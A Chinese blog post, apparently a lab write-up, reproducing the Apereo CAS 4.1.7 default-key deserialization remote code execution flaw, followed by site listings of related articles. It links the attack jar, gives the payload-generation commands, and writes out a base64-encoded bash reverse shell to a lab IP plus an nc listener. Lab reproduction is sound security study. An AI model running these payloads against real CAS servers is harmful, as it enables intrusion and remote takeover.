apereo-cas

最新推荐文章于 2024-03-16 09:45:38 发布
最新推荐文章于 2024-03-16 09:45:38 发布
阅读量140 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49420271/article/details/131107643
版权

4.1-rce

漏洞详情:

Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。

影响版本: Apereo CAS <= 4.1.7

漏洞利用:

1.进入环境:http://192.168.31.218:8080/cas/login

根据看到的版本号信息可以判断该页面存在漏洞。

2.构造PoC进行测试

  • 下载工具用于生成payload

https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-1.0-SNAPSHOT-all.jar

下载好之后,我们来使用以下命令生成payload(也就是我们要执行的命令)

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "mkdir qwe"

生成好payload之后咱就开始进行验证。

在进入的页面随便输入用户名密码,之后使用BP进行抓包。抓到数据包之后对execution字段进行修改,将这部分的数据改为我们上面生成的payload信息,之后发送。

响应状态码500说明没有啥问题,咱可以去目标容器内看一下是否成功。

OK确实存在漏洞!!

3.反弹shell

  • 反弹shell语句:/bin/bash -i >& /dev/tcp/192.168.31.197/6666 0>&1
  • 对反弹shell语句进行base64编码:L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMzEuMTk3LzY2NjYgMD4mMQo=
  • bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMzEuMTk3LzY2NjYgMD4mMQo=}|{base64,-d}|{bash,-i}

使用工具生成payload:

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMzEuMTk3LzY2NjYgMD4mMQo=}|{base64,-d}|{bash,-i}"

获得payload之后,首先打开kali端的监听端口【nc -lvvp 6666,之后再次使用BP抓包重复上述的操作,将其pauload加入execution字段中后发送。

完成一系列操作时候返回kali端,可以看到我们getshell了!

KAKAyyds
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
java-cas-client:Apereo Java CAS客户端
02-03
Java Apereo CAS客户端 介绍 这是Java Apereo CAS客户端的官方主页。 客户端由一系列Servlet过滤器组成,这些过滤器适用于大多数基于Java的Web应用程序。 它还用作API平台,以编程方式与CAS服务器进行交互,以进行身份​​验证请求,验证票证和使用主体属性。 所有客户端工件都发布到Maven Central。 根据功能,应用程序将需要在其配置中包括一个或多个列出的依赖项。 建立 git clone git@github.com:apereo/java-cas-client.git cd java-cas-client mvn clean package
Apereo CAS5.2.3 自定义登录页,验证码,扩展开发,注册功能
04-25
完整项目在https://download.csdn.net/download/u010588262/10327539 这个资源是新增功能之后的main文件夹 对应博客系列:https://blog.csdn.net/u010588262/article/category/7548325 对应博客这篇:https://blog.csdn.net/u010588262/article/details/80014083
Apereo CAS - 最强大的开源身份验证和授权框架
gitblog_00074的博客
03-14 393
Apereo CAS - 最强大的开源身份验证和授权框架 Apereo CAS 是一个业界领先的开源身份验证和授权框架。它提供了一种简单、一致的方法来保护基于 Web 的应用程序和服务。 项目简介 Apereo CAS 提供了全面的身份验证和授权功能,包括单点登录(SSO)、多因素认证(MFA)、票证管理和 API 安全等。此外,CAS 还支持许多流行的技术和标准,如 OAuth、OpenID C...
基于CAS实现单点登录(2):使用cas-overlay-template搭建cas服务器
u013938578的博客
03-09 2090
什么是maven的overlay? overlay可以把多个项目war合并成为一个项目,并且如果项目存在同名文件,那么主项目中的文件将覆盖掉其他项目的同名文件。 apereo提供了一个基于层结构的框架,可以帮助开发者快速引入cas server的代码,然后实现自由配置或代码覆盖,打包方式也非常简单。 Github地址:https://github.com/apereo/cas-...
Apereo cas 密钥硬编码反序列化漏洞复现与利用
weixin_54611959的博客
12-27 129
Apereo CAS 单点登陆系统是Java服务器环境下使用较为广泛的单点登陆系统。CAS 全程Central Authentication Service(中心认证服务),是一个单点登录协议,Apereo CAS是实现该协议的软件包。单点登录定义单点登录(Single sign on),英文名称缩写SSO,SSO的意思就是在多系统的环境中,登录单方系统,就可以在不用再次登录的情况下访问相关受信任的系统,也就是说只要登录一次单体系统就可以。
探索 Apereo .NET CAS 客户端 - 为您的 .NET 应用程序提供安全认证与授权服务
最新发布
gitblog_00093的博客
03-16 829
探索 Apereo .NET CAS 客户端 - 为您的 .NET 应用程序提供安全认证与授权服务 Apereo .NET CAS客户端 是一个开源的、基于 .NET Framework 和 .NET Core 的客户端库,它实现了对 Central Authentication Service (CAS) 协议的支持。CAS 是一个广泛使用的开放源代码身份验证协议,用于在多个应用程序之间集中管理...
Apereo Cas在项目中接入
qq_32323239的博客
12-16 1380
Apereo CAS的一个功能就是单点登录,统一的登录登出接口与页面,让系统中的模块只需要关注在业务点,而把安全认证的功能交给统一认证来做。所以客户端的集成主要是单点登录的集成,客户端指定需要做安全认证的页面,然后Apereo CAS安全包检测校验用户登录情况,并自动与CAS登录页面进行跳转交互。1、用户访问CAS Client请求资源2、客户端程序做了重定向,重定向到CAS Server。
Apereo CAS 5.0.X 简明实用教程
热门推荐
来啊 快活啊
03-07 1万+
Apereo CAS 5.0.X 启用OAuth2服务时的一个坑
Apereo CAS实现单点登录(sso)
呆大王的博客
03-08 2897
文章目录一什么是单点登录(sso)二什么是CASCAS Server3.1下载与部署cas的war包3.2启动tomcat查看cas Server是否安装成功3.3CAS Server其它功能演示四CAS 客户端五CAS 认证流程 一什么是单点登录(sso) 用户一次登录可以访问所有互相信任的应用系统 传统的session无法在系统分别部署到不同的服务器中使用 二什么是CAS 是实现SSO单点登录的框架 点击进入CAS官网: 特点 开源企业级单点登录解决方案 CAS Service(CAS服务端): 是
vulhub漏洞复现-apereo-cas反序列化命令执行漏洞复现
遇事不决冲冲冲
10-05 4457
Apereo-Cas 统一认证 - Apereo CAS 简介 微服务是将单一应用程序划分成一组小的服务,服务之间互相协调、互相配合。而每个这样的小服务可能都得进行安全验证,如果每个小的服务都得独自安全验证处理的话,就太麻烦了,所以就出现了统一处理这些安全相关的认证或授权的服务,这些服务中比较出名的有Apereo CAS ,Keycloak 思路 4.1.7版本之前网站使用Webflow框架(和wordpress差不多),漏洞出现在登陆时默认密钥changeit处,我们可以利用工具生成恶意payload去
Apereo CAS5.2.3 示例代码
04-04
CAS系列博客配套demo:https://blog.csdn.net/u010588262/article/category/7548325 建议看一下Server配置的博客,资源里没有带依赖包不然太大了,博客里有说明怎么添加依赖 实现了mysql查询验证,restful api
apereo cas6.3.2可执行war,集成mysql的jdbc认证模块
03-28
cas 6.3 可执行war包,可直接在各个操作系统上执行,内置启动脚本 1、支持外部配置文件 2、支持http 3、支持mysql的jdbc配置
cas-security-spring-boot-starter:用于Apereo CAS客户端的Spring Boot Starter与Spring Security完全集成
01-30
Spring Security CAS启动器 ... < artifactId>cas-security-spring-boot-starter < version>1.0.6 但是请注意,如果您来自0.xx版本,则1.xx版本会有一些重大更改。 请检出 ,尤其是breaking changes
redmine-omniauth-oauth-cas:Redmine的CAS OAuth2插件客户端。 它允许使用Apereo CAS 5+作为OAuth提供程序在Redmine中对用户进行身份验证和创建
05-12
请随意分叉和更新:)Redmine omniauth OAuth2 / CAS / ISU 此插件用于使用提供程序(“授权代码”授予类型)对Redmine用户进行身份验证。 它主要旨在与ISU系统。 版本:5.0 版本:3.2.3(截至发布日期,其他版本也应...
五分钟复现apereo-cas反序列化命令执行
liaowang321的博客
03-21 3075
五分钟复现apereo-cas反序列化命令执行一、漏洞成因二、攻击思路三、漏洞复现四、反弹shell五、修复建议 一、漏洞成因 pereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。 参考链接:https://apereo.github.io/2016/04/08/commonsvulndisc/ 漏洞原理实际上是Webflow中使用了默认密钥chang
Apereo-cas 4.1 反序列化 RCE 漏洞
菜鸟的学习笔记
06-28 961
Apereo-cas 4.1 反序列化 RCE 漏洞 一. 环境搭建 使用vulhub提供的文件创建漏洞复现环境 运行后将监听8080端口,访问http://your-ip:8080/cas/login查看登录页面。 二. Exploit 4.1.7 之前 Apereo CAS 的开箱即用默认配置使用默认密钥changeit: public class EncryptedTranscoder implements Transcoder { private CipherBean cipherBe
Apereo-cas4.1 反序列化 Rce漏洞复现
m0_58596609的博客
01-19 4913
Apereo-cas4.1 反序列化Rce漏洞复现
(六)vulhub专栏:Apereo-cas 4.x反序列化漏洞
云舒的博客
07-20 608
cas反序列化漏洞
https://github.com/apereo/cas 打不开‘
05-13
看起来链接确实无法打开。这个链接是指 Apereo CAS,一个开源的企业级身份验证和单点登录系统。你可以尝试直接访问该项目的网站:https://apereo.github.io/cas/。如果无法访问,可能是该网站已经不再维护或者有其他问题。你可以尝试通过搜索引擎查找类似的身份验证和单点登录系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值